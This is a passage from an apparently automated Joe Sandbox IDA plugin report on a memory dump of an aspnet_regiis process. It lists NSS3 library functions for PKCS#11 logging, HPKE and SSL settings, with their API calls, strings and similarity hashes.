PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F8A13

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F8A29
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C3F8A4B
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C3F8A67
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C3F8A83
PR_LogPrint.NSS3( phKey = 0x%p,?), ref: 6C3F8AA1
PL_strncpyz.NSS3(?, *phKey = 0x%x,00000050), ref: 6C3F8B43
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F8B52
PR_LogPrint.NSS3(?,00000000), ref: 6C3F8B68

Strings

pTemplate = 0x%p, xrefs: 6C3F8A62
C_GenerateKey, xrefs: 6C3F89D1
pMechanism = 0x%p, xrefs: 6C3F8A46
nMl, xrefs: 6C3F8AD0, 6C3F8B0B
(CK_INVALID_HANDLE), xrefs: 6C3F8A0C, 6C3F8B4B
*phKey = 0x%x, xrefs: 6C3F8B2D, 6C3F8B3D
phKey = 0x%p, xrefs: 6C3F8A9C
ulCount = %d, xrefs: 6C3F8A7E
hSession = 0x%x, xrefs: 6C3F89EE, 6C3F89FE

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pTemplate = 0x%p$ phKey = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKey$nMl
API String ID: 1003633598-3454428134
Opcode ID: fd84d2d30b27d37b1d49648c67a87ae5e24dbbe9fe0a293052ffd34a6d2509e3
Instruction ID: 3a0f6c4200b1ab1072503fdeed4eca96cc5a4664fc34ac7a4ed8bf2a391dfe6d
Opcode Fuzzy Hash: fd84d2d30b27d37b1d49648c67a87ae5e24dbbe9fe0a293052ffd34a6d2509e3
Instruction Fuzzy Hash: 9151C134601244ABDB04DF14CD88E9F3BB5AB4631DF064469E8146BB11D735AC1ACFAB

Function 6C3FAF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C3FAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3FAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3FAF83

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3FAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C3FAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C3FAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C3FAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C3FB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C3FB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C3FB041

Strings

ulParameterLen = 0x%p, xrefs: 6C3FAFD4
nMl, xrefs: 6C3FB059, 6C3FB093
(CK_INVALID_HANDLE), xrefs: 6C3FAF7C
pulSignatureLen = 0x%p, xrefs: 6C3FB03C
pSignature = 0x%p, xrefs: 6C3FB023
C_SignMessage, xrefs: 6C3FAF41
hSession = 0x%x, xrefs: 6C3FAF5E, 6C3FAF6E
pParameter = 0x%p, xrefs: 6C3FAFB9
pData = 0x%p, xrefs: 6C3FAFEF
ulDataLen = %d, xrefs: 6C3FB00A

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$nMl
API String ID: 1003633598-1861025820
Opcode ID: 28b24c2cb6825050b86b48f66f423960f1da93a9d31ff1920019d24e240ad870
Instruction ID: 6a7ca770c5799272f9ebde5f8ac46f887c17079f6bda935581dd74320549c720
Opcode Fuzzy Hash: 28b24c2cb6825050b86b48f66f423960f1da93a9d31ff1920019d24e240ad870
Instruction Fuzzy Hash: C441E179601245EFEB00DF10DD48E8A3BB1AB4631DF4A4468E8186BA21D7359859CFAA

Function 6C3F08F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C3F094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3F0953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C3F096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C3F0974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C3F098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C3F0995

Part of subcall function 6C3F1800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C3F1860
Part of subcall function 6C3F1800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C3F09BF), ref: 6C3F1897
Part of subcall function 6C3F1800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C3F18AA
Part of subcall function 6C3F1800: memcpy.VCRUNTIME140(?,?,?), ref: 6C3F18C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C3F0B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C3F0B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C3F0B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C3F0B78

Strings

exp, xrefs: 6C3F0B36
psk_id_hash, xrefs: 6C3F09B5
key, xrefs: 6C3F0ACB
info_hash, xrefs: 6C3F09E0
base_nonce, xrefs: 6C3F0B06
secret, xrefs: 6C3F0A88

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-763765719
Opcode ID: 22333175d9ebdeb882b21b0efa0d70f423a10af7ed7e23e2b3dfc53a5da97467
Instruction ID: 6524f3c91c280646ba0f03d15a85ad88691f1f4a93f954e9b69f158ee3aa7f4b
Opcode Fuzzy Hash: 22333175d9ebdeb882b21b0efa0d70f423a10af7ed7e23e2b3dfc53a5da97467
Instruction Fuzzy Hash: 2E817A75604345AFD700DF58C880D9AF7E9EF88208F04891DF9A897751E731E91ACB92

Function 6C402D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C402DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C402E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C402E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C402E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C3D4F1C,?,-00000001,00000000,?), ref: 6C402E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C3D4F1C,?,-00000001,00000000), ref: 6C402E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C402EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C402EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C402EF8
PR_Unlock.NSS3(?), ref: 6C402F62
TlsGetValue.KERNEL32 ref: 6C402F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C402F9E
PR_Unlock.NSS3(?), ref: 6C402FCA
TlsGetValue.KERNEL32 ref: 6C40301A
EnterCriticalSection.KERNEL32(?), ref: 6C40302E
PR_Unlock.NSS3(?), ref: 6C403066
PR_SetError.NSS3(00000000,00000000), ref: 6C403085
PR_Unlock.NSS3(?), ref: 6C4030EC
TlsGetValue.KERNEL32 ref: 6C40310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C403124
PR_Unlock.NSS3(?), ref: 6C40314C

Part of subcall function 6C3E9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C41379E,?,6C3E9568,00000000,?,6C41379E,?,00000001,?), ref: 6C3E918D
Part of subcall function 6C3E9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C41379E,?,6C3E9568,00000000,?,6C41379E,?,00000001,?), ref: 6C3E91A0

Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07AD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07CD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07D6
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C34204A), ref: 6C3B07E4
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,6C34204A), ref: 6C3B0864
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3B0880
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,6C34204A), ref: 6C3B08CB
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08D7
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08FB

PR_SetError.NSS3(00000000,00000000), ref: 6C40316D

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 2f9ef897ad66487abdd8912c89cb65ebfa12ff48dd7b05b311451879ba80e04c
Instruction ID: 09ae44850ec0ec025475a4371b893bfd5310eac1189a00408aaea08f7e32c408
Opcode Fuzzy Hash: 2f9ef897ad66487abdd8912c89cb65ebfa12ff48dd7b05b311451879ba80e04c
Instruction Fuzzy Hash: B1F18EB1E402099FDF10EF64D849F9EBBB4BF09318F154169EC05ABB51EB31A985CB81

Function 6C3F6D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C3F6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F6DC3

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C3F6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C3F6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C3F6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C3F6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C3F6EB9

Strings

pulDigestLen = 0x%p, xrefs: 6C3F6E42
*pulDigestLen = 0x%x, xrefs: 6C3F6EB4
nMl, xrefs: 6C3F6E61, 6C3F6E95
(CK_INVALID_HANDLE), xrefs: 6C3F6DBC
C_Digest, xrefs: 6C3F6D81
pDigest = 0x%p, xrefs: 6C3F6E27
hSession = 0x%x, xrefs: 6C3F6D9E, 6C3F6DAE
pData = 0x%p, xrefs: 6C3F6DF5
ulDataLen = %d, xrefs: 6C3F6E0E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nMl
API String ID: 1003633598-1933821783
Opcode ID: 7c8ba555d5c7adf91494e15cbc764cb620e396d539871ad50d44e4e3e77d0e91
Instruction ID: 92ff180c402d355a3c667afc728bdcb24fba26d3eeafcf4961334ac3c798e55e
Opcode Fuzzy Hash: 7c8ba555d5c7adf91494e15cbc764cb620e396d539871ad50d44e4e3e77d0e91
Instruction Fuzzy Hash: 2F41D439601144AFDB00DF54DD59E8A3BF5AB9631DF064468F808A7A12DB35E809CFE7

Function 6C3F8820 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C3F8846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F8874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F8883

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F8899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C3F88BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C3F88D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C3F88EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C3F8907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C3F8979

Strings

pulPartLen = 0x%p, xrefs: 6C3F8902
C_DecryptVerifyUpdate, xrefs: 6C3F8841
nMl, xrefs: 6C3F8921, 6C3F8955
(CK_INVALID_HANDLE), xrefs: 6C3F887C
pEncryptedPart = 0x%p, xrefs: 6C3F88B5
ulEncryptedPartLen = %d, xrefs: 6C3F88CE
*pulPartLen = 0x%x, xrefs: 6C3F8974
pPart = 0x%p, xrefs: 6C3F88E7
hSession = 0x%x, xrefs: 6C3F885E, 6C3F886E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate$nMl
API String ID: 1003633598-1490978083
Opcode ID: c53099347a369b20d67a819961596419c670b7c744d6c54d6d008d9b3f511e90
Instruction ID: 3b2ac0c4469981e438a1843fd00aeb48940b3f92b99c9e67d40a2e1512a09d80
Opcode Fuzzy Hash: c53099347a369b20d67a819961596419c670b7c744d6c54d6d008d9b3f511e90
Instruction Fuzzy Hash: 45410139A01144AFEB00DF11DD49E8A3BB1AB4732DF0A4466E808A7A21D7359819CFE7

Function 6C3F6960 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptUpdate), ref: 6C3F6986
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F69B4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F69C3

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F69D9
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C3F69FA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C3F6A13
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C3F6A2C
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C3F6A47
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C3F6AB9

Strings

C_DecryptUpdate, xrefs: 6C3F6981
pulPartLen = 0x%p, xrefs: 6C3F6A42
nMl, xrefs: 6C3F6A61, 6C3F6A95
(CK_INVALID_HANDLE), xrefs: 6C3F69BC
pEncryptedPart = 0x%p, xrefs: 6C3F69F5
ulEncryptedPartLen = %d, xrefs: 6C3F6A0E
*pulPartLen = 0x%x, xrefs: 6C3F6AB4
pPart = 0x%p, xrefs: 6C3F6A27
hSession = 0x%x, xrefs: 6C3F699E, 6C3F69AE

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptUpdate$nMl
API String ID: 1003633598-693679699
Opcode ID: 15b10efcf69e73d88fcd0400370986c661db871b606e6568cc372d2d3da05788
Instruction ID: 7940d6a8e9af5956f6da91c6844e11a50fdacbccd0188a5cfca00dbb700df0e5
Opcode Fuzzy Hash: 15b10efcf69e73d88fcd0400370986c661db871b606e6568cc372d2d3da05788
Instruction Fuzzy Hash: 2D41D175641140AFEB00DF14DD49E8A3BF1EB8632DF4A8464E808A7A11DB35E849CFE6

Function 6C404C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C404C4C
EnterCriticalSection.KERNEL32(?), ref: 6C404C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C404CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C404CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C404CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C404D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C404D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C404DB7

Part of subcall function 6C46DD70: TlsGetValue.KERNEL32 ref: 6C46DD8C
Part of subcall function 6C46DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C46DDB4

Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07AD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07CD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07D6
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C34204A), ref: 6C3B07E4
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,6C34204A), ref: 6C3B0864
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3B0880
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,6C34204A), ref: 6C3B08CB
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08D7
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08FB

TlsGetValue.KERNEL32 ref: 6C404DD7
EnterCriticalSection.KERNEL32(?), ref: 6C404DEC
PR_Unlock.NSS3(?), ref: 6C404E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C404E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C404E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C404E71
free.MOZGLUE(00000000), ref: 6C404E7A
PR_Unlock.NSS3(?), ref: 6C404EA2
TlsGetValue.KERNEL32 ref: 6C404EC1
EnterCriticalSection.KERNEL32(?), ref: 6C404ED6
PR_Unlock.NSS3(?), ref: 6C404F01
free.MOZGLUE(00000000), ref: 6C404F2A

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 25cbcfc11f58706e30781b346371dff2e3052d38b8ac6ef31c5f66e26374b21d
Instruction ID: cef8769afa26ede555db89c801f1047181855cec059519b878850145753404d1
Opcode Fuzzy Hash: 25cbcfc11f58706e30781b346371dff2e3052d38b8ac6ef31c5f66e26374b21d
Instruction Fuzzy Hash: 9BB1ECB1A402059FEB00EF68DC85EAA77B4BF19359F055138EC159BB00EB35E960CBD1

Function 6C456E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C456BF7), ref: 6C456EB6

Part of subcall function 6C3B1240: TlsGetValue.KERNEL32(00000040,?,6C3B116C,NSPR_LOG_MODULES), ref: 6C3B1267
Part of subcall function 6C3B1240: EnterCriticalSection.KERNEL32(?,?,?,6C3B116C,NSPR_LOG_MODULES), ref: 6C3B127C
Part of subcall function 6C3B1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C3B116C,NSPR_LOG_MODULES), ref: 6C3B1291
Part of subcall function 6C3B1240: PR_Unlock.NSS3(?,?,?,?,6C3B116C,NSPR_LOG_MODULES), ref: 6C3B12A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C4FFC0A,6C456BF7), ref: 6C456ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C456EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C456EFC
PR_NewLock.NSS3 ref: 6C456F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C456F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C456BF7), ref: 6C456F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C456BF7), ref: 6C456F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C456BF7), ref: 6C456FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C456BF7), ref: 6C456FFD

Strings

NSS_SSL_CBC_RANDOM_IV, xrefs: 6C456FF8
SSLFORCELOCKS, xrefs: 6C456F2B
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C456F4F
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C456FDB
SSLKEYLOGFILE, xrefs: 6C456EB1
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C456EF7

Memory Dump Source

